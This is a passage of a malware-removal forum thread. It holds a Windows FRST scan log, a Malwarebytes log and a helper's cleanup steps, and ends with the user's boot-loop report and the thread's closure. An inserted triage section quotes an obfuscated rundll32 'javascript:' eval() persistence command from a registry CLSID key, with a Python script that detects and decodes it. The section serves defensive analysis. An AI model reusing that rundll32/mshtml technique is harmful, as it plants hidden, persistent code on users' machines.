2014-10-21 09:33 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-01-15 09:33 - 2014-01-15 09:33 - 00293376 _____ () C:\Windows\system32\CHookExt.dll
2013-02-20 16:56 - 2012-02-01 16:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2013-01-28 12:08 - 2013-01-28 12:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 12:08 - 2013-01-28 12:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-09-10 09:26 - 2013-09-10 09:26 - 02214912 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtCore_2012.dll
2013-09-10 09:26 - 2013-09-10 09:26 - 08044544 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtGui_2012.dll
2012-01-26 08:36 - 2012-01-26 08:36 - 00278528 ____R () C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\xerces-depdom_2_6.dll
2013-05-29 11:36 - 2013-05-29 11:36 - 01958560 _____ () C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\niwsrp.dll
2014-09-24 22:12 - 2014-09-24 22:12 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2013-09-11 00:34 - 2014-10-27 21:01 - 03649648 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup
MSCONFIG\startupreg: 1135n Scan2PC => "C:\Windows\twain_32\Dell\Dell1135\Scan2Pc.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: TdmNotify => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2032665127-3746338806-4175205368-500 - Administrator - Disabled)
Guest (S-1-5-21-2032665127-3746338806-4175205368-501 - Limited - Disabled)
UpdatusUser (S-1-5-21-2032665127-3746338806-4175205368-1000 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

Name: Control Vault w/ Fingerprint Swipe Sensor
Description: Control Vault w/ Fingerprint Swipe Sensor
Class Guid: {53d29ef7-377c-4d14-864b-eb3a85769359}
Manufacturer: Broadcom Corporation
Service: WUDFRd
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.

Name: Broadcom Usbccid Smartcard Reader (WUDF)
Description: Broadcom Usbccid Smartcard Reader (WUDF)
Class Guid: {50dd5230-ba8a-11d1-bf5d-0000f805f530}
Manufacturer: Broadcom
Service: WUDFRd
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_RpcEptMapper, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: rpcss.dll, version: 6.1.7601.17514, time stamp: 0x4ce7c970
Exception code: 0xc0000005
Fault offset: 0x00000000000646ac
Faulting process id: 0x3cc
Faulting application start time: 0xsvchost.exe_RpcEptMapper0
Faulting application path: svchost.exe_RpcEptMapper1
Faulting module path: svchost.exe_RpcEptMapper2
Report Id: svchost.exe_RpcEptMapper3

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134


System errors:
=============
Error: (11/04/2014 09:43:14 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/04/2014 09:42:43 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADC1104)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/04/2014 09:23:58 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: The handle is invalid.Broadcom Corp Contacted SmartCard 0GET_STATEXX XX XX XX

Error: (11/04/2014 09:08:35 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WvPCR service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The SI TSS v1.2.1.41 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (11/04/2014 09:08:07 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain ADC1104 due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Remote Procedure Call (RPC) service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Reboot the machine.

Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The RPC Endpoint Mapper service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.

Error: (11/04/2014 09:00:01 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\adc.com\SysVol\adc.com\Policies\{97A64E57-5354-4D99-8398-66406F78FA5A}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.


Microsoft Office Sessions:
=========================
Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: )
Description:

Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_RpcEptMapper6.1.7600.163854a5bc3c1rpcss.dll6.1.7601.175144ce7c970c000000500000000000646ac3cc01cff7ae99170b7eC:\Windows\system32\svchost.exec:\windows\system32\rpcss.dll6e65f048-642b-11e4-a9a8-b8ca3ad1aa18

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279

Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998

Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134


==================== Memory info ===========================

Processor: Intel® Core i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 70%
Total physical RAM: 6015.18 MB
Available physical RAM: 1766.91 MB
Total Pagefile: 12028.55 MB
Available Pagefile: 7572.97 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:118.46 GB) (Free:49.89 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 119.2 GB) (Disk ID: D7B04F5B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================

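The CustomCLSID line in the FRST log above is the one that matters: under the user's own hive (HKU\S-1-5-21-...-1167_Classes) the localserver32 value for {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} is not a path to a COM server binary but a rundll32.exe javascript: command that eval()s an obfuscated string, and the System errors list a DCOM 10010 event for the same CLSID. Because the key sits in the per-user Classes hive, only that account activates it. Below is an added triage script, written for this page and not part of the thread, of FRST or of Malwarebytes, that parses FRST-style CustomCLSID lines, flags values that run script instead of a binary, undoes the obfuscation visible in the log (each character shifted up by one code point, so "epdvnfou" is "document") and correlates the CLSID with DCOM 10010 events. The sample lines are constructed from the log above; the second, benign CLSID and all function names are made up for the example.

```python
import re

# Constructed sample input for this example: the first CustomCLSID line and
# the DCOM 10010 event are modelled on the FRST log above (same CLSID, same
# truncated eval() string); the second CustomCLSID line is a made-up benign
# entry so the filter has something to ignore.
FRST_LINES = [
    r'CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    r'CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{11111111-2222-3333-4444-555555555555}\localserver32 -> C:\Program Files\Example\Example.exe',
]
EVENT_LINES = [
    'Error: (11/04/2014 09:43:14 AM) (Source: DCOM) (EventID: 10010) (User: )',
    'Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}',
]

CLSID_RE = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}')
CUSTOM_CLSID_RE = re.compile(
    r'^CustomCLSID:\s+HKU\\(?P<sid>S-1-5-21-[\d-]+)_Classes\\CLSID\\'
    r'(?P<clsid>\{[0-9A-Fa-f-]+\})\\(?P<sub>\w+)\s+->\s+(?P<value>.*)$',
    re.IGNORECASE,
)

# Markers of script-in-registry COM persistence as seen in the log: a COM
# server "path" that is really a rundll32 javascript: URL, the mshtml
# RunHTMLApplication trick, and an eval() of obfuscated text.
SCRIPT_MARKERS = ('rundll32.exe javascript:', 'mshtml,runhtmlapplication', 'eval(')


def parse_custom_clsid(line):
    """Split an FRST CustomCLSID line into SID, CLSID, subkey and value."""
    m = CUSTOM_CLSID_RE.match(line)
    if not m:
        return None
    return {
        'sid': m.group('sid'),
        'clsid': m.group('clsid').upper(),   # normalise case for correlation
        'subkey': m.group('sub').lower(),
        'value': m.group('value'),
    }


def is_script_server(value):
    """True if a (Local|Inproc)Server32 value runs script instead of a binary."""
    v = value.lower()
    return any(marker in v for marker in SCRIPT_MARKERS)


def extract_eval_arg(value):
    """Return the string literal passed to eval(), or None."""
    m = re.search(r'eval\("([^"]*)', value)
    return m.group(1) if m else None


def decode_shift(text, shift=1):
    """Undo the obfuscation seen in the log: every character is the plaintext
    character plus one code point (e.g. 'epdvnfou' -> 'document')."""
    return ''.join(chr(ord(c) - shift) for c in text)


def dcom_10010_clsids(event_lines):
    """CLSIDs named by DCOM 10010 events (server did not register in time)."""
    found = set()
    for i, line in enumerate(event_lines):
        if '(Source: DCOM)' in line and '(EventID: 10010)' in line:
            # The CLSID sits on the following Description line.
            window = ' '.join(event_lines[i:i + 2])
            found.update(c.upper() for c in CLSID_RE.findall(window))
    return found


def triage(frst_lines, event_lines):
    """List per-user CLSID entries whose server is script, with the decoded
    start of the payload and whether DCOM already complained about the CLSID."""
    dcom = dcom_10010_clsids(event_lines)
    findings = []
    for line in frst_lines:
        entry = parse_custom_clsid(line)
        if not entry or not is_script_server(entry['value']):
            continue
        arg = extract_eval_arg(entry['value'])
        findings.append({
            'sid': entry['sid'],
            'clsid': entry['clsid'],
            'subkey': entry['subkey'],
            'decoded_prefix': decode_shift(arg) if arg else None,
            'seen_in_dcom_10010': entry['clsid'] in dcom,
        })
    return findings


if __name__ == '__main__':
    for finding in triage(FRST_LINES, EVENT_LINES):
        print(finding)
```

The decoded prefix of the truncated value reads document.write('<script language=jscr, so the eval() is assembling a second script tag; FRST printed only the first part of the value and the script decodes only what is on the page. The header of FRST's Custom CLSID section says that including the CustomCLSID line in fixlist.txt removes the key, and the triage output tells you which line that is.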

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/4/2014
Scan Time: 10:08:31 AM
Logfile: MBAMlog.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.04.03
Rootkit Database: v2014.11.01.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: bcostello

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 559493
Time Elapsed: 5 min, 42 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait

The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

==============================

If rpcss.dll comes up in the scan, please allow TDSSKiller to fix it.

Make sure you have created that system restore point before you continue!

Please read the directions carefully so you don't end up deleting something that is good!!

If in doubt about an entry....please ask or choose Skip!!!!

Don't Delete anything unless instructed to!

If you get the warning about a file UnsignedFile.Multi.Generic or LockedFile.Multi.Generic please choose

Skip and click on Continue

If a suspicious object is detected, the default action will be Skip, click on Continue

Please note that TDSSKiller can be run in safe mode if needed.

Please download the latest version of TDSSKiller from HERE and save it to your Desktop.

  • Double-click on TDSSKiller.exe to run the application, then click on Change parameters. (Leave the KSN box checked)
  • Put a checkmark beside loaded modules.
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
  • Click the Start Scan button.
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
    Any entries like this: \Device\Harddisk0\DR0 ( TDSS File System ) - please choose Skip.

    If in doubt about an entry....please ask or choose Skip

  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.

    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.

  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here. There may be 3 logs > so post or attach all of them.
  • Sometimes these logs can be very large, in that case please attach it or zip it up and attach it.

Here's a summary of what to do if you would like to print it out:

If in doubt about an entry....please ask or choose Skip

Don't Delete anything unless instructed to!

If a suspicious object is detected, the default action will be Skip, click on Continue

If you get the warning about a file UnsignedFile.Multi.Generic or LockedFile.Multi.Generic please choose

Skip and click on Continue

Any entries like this: \Device\Harddisk0\DR0 ( TDSS File System ) - please choose Skip.

If malicious objects are found, they will show in the Scan results and offer three (3) options.

Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.

Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.

~~~~~~~~~~~~~~~~~~~~

You can attach the logs if they're too long (bottom right corner of the reply page; a new window will come up).

Then...........

Please download and run ComboFix.

The most important things to remember when running it are to disable all your malware programs and run ComboFix from your desktop.

Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingcomputer.com/combofix/how-to-use-combofix

http://www.bleepingcomputer.com/download/combofix/dl/12/ <---ComboFix direct download

Please make sure you click the actual download button, not "sponsored ad links".

Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.

---------->NOTE<----------

If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

=======================

Clean out temp files:

Download TFC from here and save it to your desktop.

http://oldtimer.geekstogo.com/TFC.exe

http://www.bleepingcomputer.com/download/tfc/dl/92/

Close any open programs and Internet browsers.

Double click TFC.exe to run it on XP (for Vista and Windows 7 right click and choose "Run as administrator") and once it opens click on the Start button on the lower left of the program to allow it to begin cleaning.

Please be patient as clearing out temp files may take a while.

Once it completes you may be prompted to restart your computer, please do so.

Once it's finished you may delete TFC.exe from your desktop or save it for later use for the cleaning of temporary files.

MrC


Hey MrC, in the middle of the Malwarebytes threat scan my computer restarted unexpectedly and now I am in an endless "Startup Repair" loop. The OS will not load and the installation disc's repair utilities will not repair the computer. It won't even restore from any of my previous restore points. The best I can do is run command prompt from the disc. Unless you have advice for this situation, I'm going to have to get this sorted out before we continue...


  • On a clean machine, please download Farbar Recovery Scan Tool and save it to a flash drive.

    Note: You need to run the version compatible with your system.

    Plug the flashdrive into the infected PC.

  • If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt.

    If you are using Vista or Windows 7 enter System Recovery Options.

    To enter System Recovery Options from the Advanced Boot Options:

    • Restart the computer.
    • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
    • Use the arrow keys to select the Repair your computer menu item.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.
    Note: In case you cannot enter System Recovery Options by using the F8 method, you can use a Windows installation disc, or make a repair disc. Any Windows installation disc or a repair disc made on another computer can be used.

    To make a repair disc on Windows 7 consult: http://www.sevenforums.com/tutorials/2083-system-repair-disc-create.html

    To enter System Recovery Options by using Windows installation disc:

    • Insert the installation disc.
    • Restart your computer.
    • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
    • Click Repair your computer.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.
  • On the System Recovery Options menu you will get the following options:
    • Startup Repair
    • System Restore
    • Windows Complete PC Restore
    • Windows Memory Diagnostic Tool
    • Command Prompt

    Select Command Prompt

  • Once in the Command Prompt:
    • In the command window type in notepad and press Enter.
    • The notepad opens. Under File menu select Open.
    • Select "Computer" and find your flash drive letter and close the notepad.
    • In the command window type e:\frst (for the x64 version type e:\frst64) and press Enter

      Note: Replace letter e with the drive letter of your flash drive.

    • The tool will start to run.
    • When the tool opens click Yes to disclaimer.
    • Press Scan button.
    • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
MrC

4 weeks later...

Root Admin

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!
